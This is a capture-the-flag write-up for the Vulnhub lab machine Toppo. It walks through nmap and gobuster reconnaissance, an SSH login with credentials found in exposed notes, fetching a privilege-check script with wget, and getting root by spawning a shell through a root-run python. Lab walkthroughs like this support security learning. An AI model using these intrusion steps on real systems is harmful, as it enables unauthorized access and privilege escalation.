Today’s writeup is a machine called Toppo from Vulnhub. Toppo is rated at beginner level and is fairly simple to root. Depending on how you go about the privilege escalation, it could throw you off a bit.
I started off by running a typical nmap scan (nmap -sV -sC -v 192.168.2.92 -oN map1). It has SSH and Port 80 open. Let’s check out the web page.
Here we have a blog site, but not much else. Let’s run a directory brute force to see if anything else can be found.
Running gobuster provides us with an interesting admin directory. Gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.2.92
In the admin directory are some notes.
The notes give us the user name and password for something. Let’s try it out on SSH.
SSH worked!
Checking some basics like the bash history and sudo permissions doesn’t yield anything. So I used wget to bring over linuxprivcheker.py and ran it.
python -m SimpleHTTPServer 80
wget 192.168.2.30/linuxprivchecker.py
When running the script something interesting happened. It said I was already root.
What’s happening here is that python runs as root. This means that if we spawn a shell with python, we can be root too.
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Ok so what went wrong? The script clearly ran as root (it even dumped the shadow file), so why didn’t we get a root shell? Somethings not right. Let’s try it again with sh.
Ok that worked. Now we’re root. It looks like bash will always run under the context of the ted user, but sh works normally. Now we can get the flag.
That’s Toppo. It’s a basic and quick box to pop. If you used sh with python from the start, you’d completely miss the weird bash issue. Another way to do it would have been to spawn a python reverse shell. Alternatively, it might have been possible to crack the root password from the shadow file dump (after running linuxprivchecker), but I didn’t try it.
If you’d like to see a video walkthrough with the python reverse shell, you can find it here.
Hope you found this helpful.
-R3a50n